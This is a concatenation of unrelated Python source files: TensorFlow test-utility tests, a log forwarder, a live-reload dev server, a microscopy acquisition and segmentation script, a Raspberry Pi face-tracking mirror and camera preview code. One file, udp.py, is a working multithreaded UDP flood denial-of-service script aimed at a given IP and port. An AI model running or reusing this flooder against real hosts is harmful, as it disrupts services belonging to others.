with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegex(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[1:2], ["run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
@parameterized.named_parameters(dict(testcase_name="argument",
arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_parameterized_keyword(self, arg):
self.assertEqual(arg, True)
@combinations.generate(combinations.combine(arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_combinations(self, arg):
self.assertEqual(arg, True)
def test_build_as_function_and_v1_graph(self):
class GraphModeAndFunctionTest(parameterized.TestCase):
def __init__(inner_self): # pylint: disable=no-self-argument
super(GraphModeAndFunctionTest, inner_self).__init__()
inner_self.graph_mode_tested = False
inner_self.inside_function_tested = False
def runTest(self):
del self
@test_util.build_as_function_and_v1_graph
def test_modes(inner_self): # pylint: disable=no-self-argument
if ops.inside_function():
self.assertFalse(inner_self.inside_function_tested)
inner_self.inside_function_tested = True
else:
self.assertFalse(inner_self.graph_mode_tested)
inner_self.graph_mode_tested = True
test_object = GraphModeAndFunctionTest()
test_object.test_modes_v1_graph()
test_object.test_modes_function()
self.assertTrue(test_object.graph_mode_tested)
self.assertTrue(test_object.inside_function_tested)
def test_with_forward_compatibility_horizons(self):
tested_codepaths = set()
def some_function_with_forward_compat_behavior():
if compat.forward_compatible(2050, 1, 1):
tested_codepaths.add("future")
else:
tested_codepaths.add("present")
@test_util.with_forward_compatibility_horizons(None, [2051, 1, 1])
def some_test(self):
del self # unused
some_function_with_forward_compat_behavior()
some_test(None)
self.assertEqual(tested_codepaths, set(["present", "future"]))
class SkipTestTest(test_util.TensorFlowTestCase):
def _verify_test_in_set_up_or_tear_down(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError,
["foo bar", "test message"]):
raise ValueError("test message")
try:
with self.assertRaisesRegex(ValueError, "foo bar"):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError("foo bar")
except unittest.SkipTest:
raise RuntimeError("Test is not supposed to skip.")
def setUp(self):
super(SkipTestTest, self).setUp()
self._verify_test_in_set_up_or_tear_down()
def tearDown(self):
super(SkipTestTest, self).tearDown()
self._verify_test_in_set_up_or_tear_down()
def test_skip_if_error_should_skip(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError("test message")
def test_skip_if_error_should_skip_with_list(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError,
["foo bar", "test message"]):
raise ValueError("test message")
def test_skip_if_error_should_skip_without_expected_message(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError):
raise ValueError("test message")
def test_skip_if_error_should_skip_without_error_message(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError):
raise ValueError()
def test_skip_if_error_should_raise_message_mismatch(self):
try:
with self.assertRaisesRegex(ValueError, "foo bar"):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError("foo bar")
except unittest.SkipTest:
raise RuntimeError("Test is not supposed to skip.")
def test_skip_if_error_should_raise_no_message(self):
try:
with self.assertRaisesRegex(ValueError, ""):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError()
except unittest.SkipTest:
raise RuntimeError("Test is not supposed to skip.")
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
def setUp(self):
pass # Intentionally does not call TensorFlowTestCase's super()
@test_util.run_in_graph_and_eager_modes
def test_no_variable_sharing(self):
variable_scope.get_variable(
name="step_size",
initializer=np.array(1e-5, np.float32),
use_resource=True,
trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.run_in_graph_and_eager_modes
def test_no_leaked_tensor_decorator(self):
class LeakedTensorTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_new_tensors
def test_has_leak(self):
self.a = constant_op.constant([3.], name="leak")
@test_util.assert_no_new_tensors
def test_has_no_leak(self):
constant_op.constant([3.], name="no-leak")
with self.assertRaisesRegex(AssertionError, "Tensors not deallocated"):
LeakedTensorTest().test_has_leak()
LeakedTensorTest().test_has_no_leak()
def test_no_new_objects_decorator(self):
class LeakedObjectTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
inner_self.accumulation = []
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_leak(self):
self.accumulation.append([1.])
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_no_leak(self):
self.not_accumulating = [1.]
with self.assertRaises(AssertionError):
LeakedObjectTest().test_has_leak()
LeakedObjectTest().test_has_no_leak()
class RunFunctionsEagerlyInV2Test(test_util.TensorFlowTestCase,
parameterized.TestCase):
@parameterized.named_parameters(
[("_RunEagerly", True), ("_RunGraph", False)])
def test_run_functions_eagerly(self, run_eagerly): # pylint: disable=g-wrong-blank-lines
results = []
@def_function.function
def add_two(x):
for _ in range(5):
x += 2
results.append(x)
return x
with test_util.run_functions_eagerly(run_eagerly):
add_two(constant_op.constant(2.))
if context.executing_eagerly():
if run_eagerly:
self.assertTrue(all(isinstance(t, ops.EagerTensor) for t in results))
else:
self.assertTrue(all(isinstance(t, ops.Tensor) for t in results))
else:
self.assertTrue(all(isinstance(t, ops.Tensor) for t in results))
if __name__ == "__main__":
googletest.main()
|
logger.py
|
from __future__ import absolute_import
import sys
import traceback
import six
from threading import Timer, Thread, Lock
from aetros.utils import thread_join_non_blocking
def drain_stream(stream, decode='utf-8'):
content = six.b('')
while True:
try:
# read() needs to block
# buf = os.read(buffer.fileno(), 4096)
buf = stream.read(1024)
if buf == six.b(''):
break
content += buf
except Exception:
break
if decode:
return content.decode(decode)
return content
class GeneralLogger(object):
def __init__(self, redirect_to, job_backend=None):
self.job_backend = job_backend
self.buffer = ''
self.last_timer = None
self.last_messages = ''
self.logger = redirect_to or sys.__stdout__
self.lock = Lock()
self.attach_last_messages = {}
self.buffer_disabled = False
def disable_buffer(self):
self.buffer_disabled = True
self.buffer = ''
def clear_buffer(self):
self.buffer = ''
def fileno(self):
return self.logger.fileno()
def isatty(self):
return self.logger.isatty()
def flush(self):
self.logger.flush()
self.send_buffer()
def send_buffer(self):
self.last_timer = None
if self.buffer:
if self.job_backend:
if self.job_backend.write_log(self.buffer):
self.buffer = ''
def attach(self, buffer, read_line=None):
"""
Read buffer until end (read() returns '') and sends it to self.logger and self.job_backend.
:param buffer: a buffer instance with block read() or readline() method
:param read_line: callable or True to read line per line. If callable is given, it will be executed per line
and the line is not redirected to stdout/logger when the callable returns False.
"""
bid = id(buffer)
self.attach_last_messages[bid] = b''
def reader():
current_line = b''
def handle_line(buf):
if buf == b'':
return
if read_line and callable(read_line):
res = read_line(buf)
if res is False:
return False
elif res is not None:
buf = res
if hasattr(buf, 'encode'):
buf = buf.encode('utf-8')
self.attach_last_messages[bid] += buf
if len(self.attach_last_messages[bid]) > 21 * 1024:
self.attach_last_messages[bid] = self.attach_last_messages[bid][-20 * 1024:]
self.write(buf)
flush_char = b'\n'
while True:
try:
# needs to be 1 so we fetch data in near real-time
chunk = buffer.read(1)
if chunk == b'':
if current_line:
handle_line(current_line)
return
current_line += chunk
while flush_char in current_line:
pos = current_line.find(flush_char)
line = current_line[:pos+1]
current_line = current_line[pos+1:]
handle_line(line)
# todo, periodically flush by '\r' only (progress bars for example)
# and make sure only necessary data is sent (by applying \r and \b control characters)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
# we need to make sure, we continue to read otherwise the process of this buffer
# will block and we have a stuck process.
sys.__stderr__.write(traceback.format_exc() + '\n')
sys.__stderr__.flush()
thread = Thread(target=reader)
thread.daemon = True
thread.start()
def wait():
thread_join_non_blocking(thread)
self.send_buffer()
return wait
def write(self, message):
try:
self.lock.acquire()
if b'' == message:
return
if hasattr(message, 'decode'):
# don't decode string again
# necessary for Python3
message = message.decode('utf-8', errors='replace')
self.logger.write(message)
self.logger.flush()
self.last_messages += message
if len(self.last_messages) > 20 * 1024:
self.last_messages = self.last_messages[-20 * 1024:]
if not self.buffer_disabled:
for char in message:
if '\b' == char and self.buffer:
self.buffer = self.buffer[:-1]
else:
self.buffer += char
if not self.last_timer:
self.last_timer = Timer(1.0, self.send_buffer)
self.last_timer.start()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
sys.__stderr__.write(traceback.format_exc() + '\n')
sys.__stderr__.flush()
finally:
if self.lock.locked():
self.lock.release()
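# Illustrative usage sketch (not part of the original module): mirroring a child
# process's stdout through GeneralLogger. With job_backend=None the output is only
# echoed to the local logger; a real backend would receive the buffered text via
# write_log() roughly once per second.
#
# import subprocess
# logger = GeneralLogger(redirect_to=sys.stdout)
# proc = subprocess.Popen([sys.executable, '-c', 'print("hello")'], stdout=subprocess.PIPE)
# wait = logger.attach(proc.stdout, read_line=True)
# proc.wait()
# wait()  # joins the reader thread and flushes the buffer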
|
udp.py
|
#!/usr/bin/env python3
import random
import time
import socket
from threading import Thread
def UDP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting UDP attack...")
threads_list = []
# UDP flood
def udp_flood():
global FINISH
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
if FINISH:
break
# Send random payload
try:
for _ in range(16):
payload = random._urandom(random.randint(1, 60))
sock.sendto(payload, (target_ip, target_port))
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" UDP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread)+ "...")
t = Thread(target = udp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
reloader.py
|
import os
from time import sleep
import helium
from threading import Thread
import re
from stellapy.logger import log
from stellapy.walker import walk, get_file_content
from stellapy.executor import Executor
from stellapy.configuration import Configuration
class Reloader:
"""
The `Reloader` class.
"""
def __init__(self, command: str, url: str) -> None:
self.project_data = self.get_project_data()
self.command = command
self.ex = Executor(self.command)
self.url = url
c = Configuration()
self.config = c.load_configuration()
@staticmethod
def get_project_data() -> dict:
"""
Returns a dict with filenames mapped to their contents.
"""
project_data = {}
for f in walk():
project_data.update({f: get_file_content(f)})
return project_data
def detect_change(self) -> bool:
"""
Detects whether a change has been made to the project. Also updates the project data
if a new change is detected.
"""
new_content = self.get_project_data()
if len(self.project_data.keys()) != len(new_content.keys()):
self.project_data = new_content
return True
try:
for k, v in self.project_data.items():
if new_content[k] != v:
self.project_data = new_content
return True
except KeyError:
self.project_data = new_content
return True
except Exception as e:
print("FATAL ERROR: This should never happen.")
print(e)
quit(1)
return False
def start_browser(self):
browser = self.config["browser"]
if browser == "chrome":
try:
helium.start_chrome(self.url)
except Exception as e:
if "Message: unknown error: cannot find Chrome binary" in str(e):
log(
"error",
"chrome binary not found. either install chrome browser or configure stella browser to firefox.",
)
self.stop_server()
elif "Reached error page" in str(e):
log("error", "app crashed, waiting for file changes to restart...")
else:
log("error", f"an unknown error occurred: \n{e}")
self.stop_server()
elif browser == "firefox":
try:
helium.start_firefox(self.url)
except Exception as e:
if "Message: unknown error: cannot find Firefox binary" in str(e):
log(
"error",
"firefox binary not found. either install chrome browser or configure stella browser to firefox.",
)
self.stop_server()
elif "Message: Reached error page" in str(e):
log("error", "app crashed, waiting for file changes to restart...")
else:
log("error", f"an unknown error occurred: \n{e}")
self.stop_server()
else:
log(
"error",
f"invalid browser specified: {browser}. stella supports only chrome and firefox. execute `stella config --browser chrome|firefox` for configuring the browser.",
)
self.stop_server()
def _restart(self):
try:
if self.detect_change():
log(
"info",
"detected changes in the project, reloading server and browser",
)
self.ex.re_execute()
sleep(1)
helium.refresh()
else:
sleep(1)
except Exception:
try:
log("error", "browser reload didnt work, retrying in 5 seconds...")
sleep(5)
helium.refresh()
except Exception:
log(
"error",
"browser reload retry failed! make sure you've provided stella the correct url to listen at. waiting for file changes to restart...",
)
def restart(self) -> None:
self.start_browser()
while True:
self._restart()
def manual_input(self) -> None:
"""
Manual restart and exit.
"""
while True:
message = input().lower().strip()
if message == "ex":
log("info", "stopping server")
self.stop_server()
elif message == "rs":
log("info", "restarting the server")
try:
self.ex.re_execute()
sleep(1)
helium.refresh()
except Exception:
try:
log(
"error",
"browser reload didnt work, retrying in 5 seconds...",
)
sleep(5)
helium.refresh()
except Exception:
log(
"error",
"browser reload retry failed! make sure you've provided stella the correct url to listen at. waiting for file changes to restart...",
)
def stop_server(self):
try:
self.ex.close()
helium.kill_browser()
except Exception as e:
log(
"error",
"an error occured while stopping the server, this should never happen.",
)
print(e)
finally:
os._exit(0)
def start_server(self) -> None:
"""
Starts the server. All reloading and stuff is done here.
"""
log("stella", "starting stella")
log(
"stella",
f"executing `{self.command}` and listening at {self.url} on the browser",
)
log(
"stella",
"input `rs` to manually restart the server and `ex` to stop the server",
)
input_thread = Thread(target=self.manual_input)
input_thread.start()
self.ex.start()
self.restart()
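# Illustrative usage sketch (not part of the original module); the command and URL below
# are hypothetical and depend on the project being watched:
#
# reloader = Reloader(command="python main.py", url="http://localhost:5000")
# reloader.start_server()  # blocks; type `rs` to restart manually and `ex` to stop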
|
rt_acquisition.py
|
#acquisition stuff
from pycromanager import Acquisition, Bridge
from skimage import io
import cv2 as cv
import json
import time
import os
import numpy as np
from multiprocessing import Process, Queue, Value
import acquisitionDialog
from utils.barcode_code import find_barcode_region, match_barcode
class run_acquisition:
"""
running acquisition using pycromanager with real-time segmentation
input: events - list of events as defined in pycromanager documentation
TODO-update documentation
TODO-error handling
TODO-connect segmentation and non-segmentation version together with segmentation and barcode flags
TODO-add 'on-the-fly' stabilization
TODO-change the metadata name from phase to 'segmentation' for segmented image
TODO-add compression for saving of images
Kuba
"""
def __init__(self, events = None, save_path = '', q = None, model_path = ''):
self.events = events
self.tot_images = len(events)
self.save_path = save_path
self.model_path = model_path
#initialise shared values
self.check_abort = Value('b',False) # <- shared between processes
self.check_segmentation_completed = Value('b',False)
#initialise shared queue
self.q = Queue()
#initialise event counter
self.counter = 0
#initialise barcode image dictionary - populate the dictionary with None
position_names = set([x['pos_label'] for x in events])
self.barcodes = dict()
for p in position_names:
self.barcodes[p] = None
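#overview: _run() starts two processes - one driving the pycromanager Acquisition
#(via _image_process_fn) and one running the UNet segmentation (segment_realTime).
#They communicate through self.q as (image, save_path) tuples, with (None, None)
#acting as the shutdown signal; check_abort lets the GUI abort the acquisition and
#check_segmentation_completed signals that the segmentation process has finished.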
def _image_process_fn(self, image, metadata, bridge, event_queue):
"""
update documentation
"""
#image acquisition hook for pycromanager - saves file and metadata
real_snap_time = int(time.time()*1000)
#update image counter
im_num = self.counter
self.counter+=1
#seems the function will be called even if event_queue is None. It was throwing an error before
if im_num+1 < len(self.events):
print(self.events[im_num])
#detect barcode if necessary - right now its linked to the segmentation parameter
detect_barcode = self.events[im_num]['segmentation']['do']
if detect_barcode:
self.detect_barcode_fun(im_num, image)
if self.events[im_num]['segmentation']['do']:
seg_save_path = self.events[im_num]['save_location'].replace(self.events[im_num]['channel']['config'], self.events[im_num]['channel']['config']+'_segmented')
#add to multiprocessing queue phase image
self.q.put((image, seg_save_path))
#take number portion of the save file and check which image it is
which_image = self.events[im_num]['save_location']
which_image = int(''.join(x for x in which_image.split('/')[-1] if x.isdigit())) #
if which_image % int(self.events[im_num]['segmentation']['save_frames']) == 0: #save if mod of image number and save_frames is 0 - this works also for the first image
io.imsave(self.events[im_num]['save_location'], image, compress=6, check_contrast=False)
# cv.imwrite(self.events[im_num]['save_location'], image) #flag is IMWRITE_TIFF_COMPRESSION + number - refer to libtiff for integer constants for compression
else:
io.imsave(self.events[im_num]['save_location'], image, compress=6, check_contrast=False)
# cv.imwrite(self.events[im_num]['save_location'], image) #I think by default it uses compression.
#update metadata - metadata is json with the format:
#{"position":"Pos10",
# "acquire_time":1622229839618,
# "exposure_time":60,
# "PosZ":8399,
# "PosY":-4986.6,
# "PosX":-689.4000000000001,
# "expected_acquire_time":1622229836398,
# "filename":"F:\\Jakub\\EXP-21-BV3236 death\\exp3\\Pos10\\aphase\\img_000000000",
# "channel":"aphase",
# "channel_group":"Fluor"}
tmp = self.events[im_num]
metadata_line = {
'position':tmp['pos_label'],
'acquire_time':real_snap_time,
'exposure_time':tmp['exposure'],
'PosZ':tmp['z'],
'PosY':tmp['y'],
'PosX':tmp['x'],
'expected_acquire_time':tmp['min_start_time'],
'filename':tmp['save_location'],
'channel':tmp['channel']['group'],
'channel_group':tmp['channel']['config']
}
metadata_line['filename'] = metadata_line['filename'].replace('/','//') #<- to match ritaaquire
with open(f"{self.save_path}/metadata.txt", 'a') as f:
f.write( json.dumps(metadata_line, separators =(',',':')) )
f.write('\n')
#add events one by one
if im_num+1 == len(self.events):#remember that numbering starts from 0 - took me a while!
event_queue.put(None)
self.q.put((None,None)) # <- signal to kill the segmentation
print('acq finished')
while not self.check_segmentation_completed.value:
time.sleep(0.1)
elif self.check_abort.value:
event_queue.put(None)
print('acq aborted') # <- signal to kill the segmentation
self.q.put((None,None))
while not self.check_segmentation_completed.value:
time.sleep(0.1)
else:
# print(self.events[im_num+1])
event_queue.put(self.events[im_num+1])
# return image,metadata
def _post_hardware_hook(self,event,bridge,event_queue):
#hook before image acquisition - wait for focus here
core = bridge.get_core()
core.full_focus() #should be PFSOffset
return event
def _pre_hardware_hook(self,event):
#placeholder
return event
def abort_acquisition(self,signal):
#wait for a signal from the GUI window
self.check_abort.value = signal
def segment_realTime(self):
"""
update documentation
TODO - also load the network instead of importing UNet
"""
#construct real time acquisition function that checks for queue
import torch
from utils.unet import UNet, UNet_deep
from utils.watershed import watershed
import numpy as np
from skimage import io, measure, morphology
# net = UNet(num_classes=1) #switch cases
net = UNet(max_filters = 512) #switch cases
# saved_model = 'F:\\Jakub\\mdma-main\\Unet_mixed_brightnessAdj_Adam_HybridLoss_512px_cellsUnweighted.pth' #01.06.2021
# saved_model = 'C:\\Users\\kubus\\Documents\\trained_models\\Unet_mixed_brightnessAdj_Adam_HybridLoss_512px_cellsUnweighted.pth' #01.06.2021
#load specified model
saved_model = self.model_path
try:
saved_net = torch.load(saved_model)
except OSError as err:
print(f"error in model path: {err}")
return
net.load_state_dict(saved_net['model_state_dict'])
net.cuda()
while True:
#segmentation core
im, save_path = self.q.get()
if im is None: #'poison pill'
self.check_segmentation_completed.value = True
print('segmentation completed')
break
im = im.astype('float32')
#pad image to match minimum UNet size requirements
pad_size = 32
sz = im.shape
pad_with = np.ceil(np.array(sz)/pad_size)*pad_size - sz
pad_with = pad_with.astype('int')
im = np.pad(im, pad_width=((0,pad_with[0]),(0,pad_with[1])),mode='constant')
dtype = torch.FloatTensor
im = torch.from_numpy(im).unsqueeze(0).unsqueeze(0).type(dtype)
im = (im - torch.mean(im)) / torch.std(im)
net.eval()
im = im.cuda()
pred = net(im)
pred = torch.sigmoid(pred)
pred = pred.to('cpu').detach().numpy().squeeze(0).squeeze(0)
pred = pred[0:sz[0], 0:sz[1]]
thresh = 0.5
pred = pred > thresh
# pred = watershed(pred)
pred = morphology.remove_small_objects(pred,100)
pred_labels = measure.label(pred).astype('uint16')
io.imsave(save_path,pred_labels, compress=6, check_contrast=False)
# cv.imwrite(save_path,pred_labels)
def detect_barcode_fun(self,im_num,image):
#find barcode and save the location of upper left corner of the detection
if self.barcodes[self.events[im_num]['pos_label']] is None:
barcode_img = find_barcode_region(image)
self.barcodes[self.events[im_num]['pos_label']] = barcode_img
barcode_img = self.barcodes[self.events[im_num]['pos_label']]
if barcode_img is None:
top_left = None
# bottom_right = None
#for debugging - switched off because barcode image is not saved
# b_image = np.zeros((100,100))
else:
top_left, bottom_right = match_barcode(image, barcode_img)
#for debugging - switched off because barcode image is not saved
# b_image = image[top_left[1]:bottom_right[1],top_left[0]:bottom_right[0]]
# #save barcode image
barcode_save_path = self.events[im_num]['save_location'].replace(self.events[im_num]['channel']['config'],'barcode')
#!!
#DONT SAVE THE BARCODE IMAGE - IT SEEMS TO BE STABLE ENOUGH
#!!
# #could be moved for the first instance of the function call
# if not(os.path.exists(os.path.split(barcode_save_path)[0])):
# os.makedirs(os.path.split(barcode_save_path)[0])
# io.imsave(barcode_save_path, b_image, compress=6, check_contrast=0)
barcode_loc = dict()
barcode_loc['file'] = barcode_save_path
barcode_loc['pos'] = top_left
with open(f"{self.save_path}/barcode_locations.txt", 'a') as f:
f.write(json.dumps(barcode_loc, separators=(',',':')))
f.write('\n')
def _runAcq(self):
#here acquisition needs to be stopped by adding 'None' to event_queue
acq = Acquisition(image_process_fn = self._image_process_fn, post_hardware_hook_fn = self._post_hardware_hook)
acq.acquire(self.events[0])
def _run(self):
p1 = Process(target=self._runAcq, args=())
p1.start()
p2 = Process(target=self.segment_realTime, args=())
p2.start()
#open GUI showing progress and adding aborting functionality
total_time = max([t['min_start_time'] for t in self.events])
self.acquisitionDialog = acquisitionDialog.acquisitionDialog(total_time = total_time)
self.acquisitionDialog.abort_acq.connect(self.abort_acquisition)
def main():
acq = run_acquisition()
acq._run()
if __name__ == '__main__':
main()
|
faceRecog.py
|
import cv2
import atexit
import numpy as np
import argparse
import RPi.GPIO as GPIO
import time
import sys
import signal
from picamera import PiCamera, mmal
from picamera.array import PiRGBArray
from picamera.mmalobj import to_rational
from multiprocessing import Process, Queue, Event
from motor import Motor
MAX_ANGLE_1 = 1500
MAX_ANGLE_2 = 900
REWIND_ANGLE_1 = 750 #Rewind angle for motor 1
REWIND_ANGLE_2 = 150 #Rewind angle for motor 2
def cleanup():
GPIO.cleanup()
def motorThread(stop_event, calibrate_event, in_q, en_q):
signal.signal(signal.SIGINT, signal.SIG_IGN)
motor_1 = Motor(1, direction_1, step_1, enable_1, switch_1, MAX_ANGLE_1, REWIND_ANGLE_1, debug=debug)
motor_2 = Motor(2, direction_2, step_2, enable_2, switch_2, MAX_ANGLE_2, REWIND_ANGLE_2, debug=debug)
motor_1.calibrate()
motor_2.calibrate()
motor_1.add_event_detect()
motor_2.add_event_detect()
calibrate_event.set() #Tells the camThread that the motors are ready
direction = None
enable = None
while True:
#Shuts the thread off
if stop_event.is_set():
break
if in_q.qsize() > 0:
direction = in_q.get()
if en_q.qsize() > 0:
enable = en_q.get()
if enable:
motor_1.move(direction, 0.0008)
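#camThread feeds motorThread through two queues: dir_q/in_q carries the requested
#direction (GPIO.HIGH when the face is in the left half of the frame, GPIO.LOW for
#the right half) and en_q carries whether a face was detected, which enables movement.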
def camThread(stop_event, calibrate_event, out_q, en_q):
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Load the cascade
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if debug: print("\nLoaded cascade")
#Sets up the camera
with PiCamera() as camera:
camera.resolution = (640, 480)
camera.framerate = 5
camera.exposure_mode = 'night'
#Sets digital gain to 8.0
mmal.mmal_port_parameter_set_rational(camera._camera.control._port, mmal.MMAL_PARAMETER_GROUP_CAMERA + 0x5A, to_rational(8.0))
rawCapture = PiRGBArray(camera, size=(640, 480))
width = camera.resolution[0]
time_stamp_old = time.perf_counter()
calibrate_event.wait() #Waits for the motors to finish calibrating
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
#print(f"target fps: {camera.framerate}, dg: {camera.digital_gain}, exposure: {camera.exposure_mode}")
# Read the frame
img = frame.array
# Convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect the faces
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
# Draw the rectangle around each face and decide whether to go left or right
enable = False
for (x, y, w, h) in faces:
enable = True
if args.show:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
center = (x+w/2, y+h/2)
if center[0] <= width/2:
if debug: print("Left half of image")
out_q.put(GPIO.HIGH)
else:
if debug: print("Right half of image")
out_q.put(GPIO.LOW)
en_q.put(enable)
# Display
if args.show:
cv2.imshow('img', img)
# Stop if escape key is pressed
k = cv2.waitKey(30) & 0xff
if k==27:
break
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
rawCapture.seek(0)
#Calculates and prints the FPS to std out
if args.fps:
time_stamp_new = time.perf_counter()
fps = 1/(time_stamp_new-time_stamp_old)
sys.stdout.write("\rFPS: {0} ".format(round(fps, 1)))
sys.stdout.flush()
time_stamp_old = time_stamp_new
#shuts the thread off
if stop_event.is_set():
break
if __name__ == "__main__":
#Argument parsing
parser = argparse.ArgumentParser(description="Mirror Pi - The mirror that\'s avoiding you")
parser.add_argument("-s","--show", help="Shows the camera and face recognition output to the screen", action="store_true")
parser.add_argument("-c","--nocalibrate", help="Skips the calibration of the motors", action="store_true")
parser.add_argument("-f","--fps", help="Calculates and prints the FPS to std out", action="store_true")
parser.add_argument("-d", "--debug", help="Prints debug statements to std out", action="count", default=0)
args = parser.parse_args()
#This function is called when the program is forced to close
atexit.register(cleanup)
#Pin setup
direction_1 = 3 #Green
step_1 = 5 #Yellow
enable_1 =7 #White
switch_1 = 11 #White
direction_2 = 8 #Green
step_2 = 10 #Yellow
enable_2 = 12 #White
switch_2 = 16 #White
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
#Multiprocesses
dir_q = Queue()
en_q = Queue()
stop_event = Event()
calibrate_event = Event()
debug = args.debug
motor = Process(target=motorThread, args=(stop_event, calibrate_event, dir_q, en_q,))
camera = Process(target=camThread, args=(stop_event, calibrate_event, dir_q, en_q,))
motor.start()
camera.start()
try:
while True:
pass
except (KeyboardInterrupt, SystemExit):
print("\nExiting...")
stop_event.set()
motor.join()
camera.join()
cleanup()
|
qt_gl_preview.py
|
import picamera2
import threading
import atexit
class QtGlPreview:
def thread_func(self, picam2, width, height):
# Running Qt in a thread other than the main thread is a bit tricky...
from q_gl_picamera2 import QApplication, QGlPicamera2
self.app = QApplication([])
self.size = (width, height)
self.qpicamera2 = QGlPicamera2(picam2, width=width, height=height)
self.qpicamera2.setWindowTitle("QtGlPreview")
self.qpicamera2.show()
picam2.asynchronous = True
atexit.register(self.stop)
self.event.set()
self.app.exec()
atexit.unregister(self.stop)
self.qpicamera2.picamera2.asynchronous = False
del self.qpicamera2.camera_notifier
del self.qpicamera2
del self.app
def __init__(self, picam2, width=640, height=480):
self.event = threading.Event()
self.thread = threading.Thread(target=self.thread_func, args=(picam2, width, height))
self.thread.daemon = True
self.thread.start()
self.event.wait()
def stop(self):
if hasattr(self, "app"):
self.app.quit()
self.thread.join()
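# Illustrative usage sketch (not part of the original file); the exact configuration and
# start calls depend on the picamera2 version in use:
#
# picam2 = picamera2.Picamera2()
# preview = QtGlPreview(picam2)  # spawns the Qt event loop in a background thread
# ...configure and start picam2 here...
# preview.stop()  # quits the Qt app and joins the preview thread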
|
ArtefactBlockGenerator.py
|
import os
import math
import time
import gc
import h5py
import threading
import numpy as np
from skimage.io import imread
from skimage.measure import regionprops,label
from skimage.transform import resize
from . import DataGenerator
class BlockLoader():
def __init__(self, directory, cur_idx, next_idx):
self.t0 = time.time()
self.directory = directory
self.current_block = (None, None) # block_x, block_y
self.next_block = (None, None) # block_x, block_y
self.status = 0
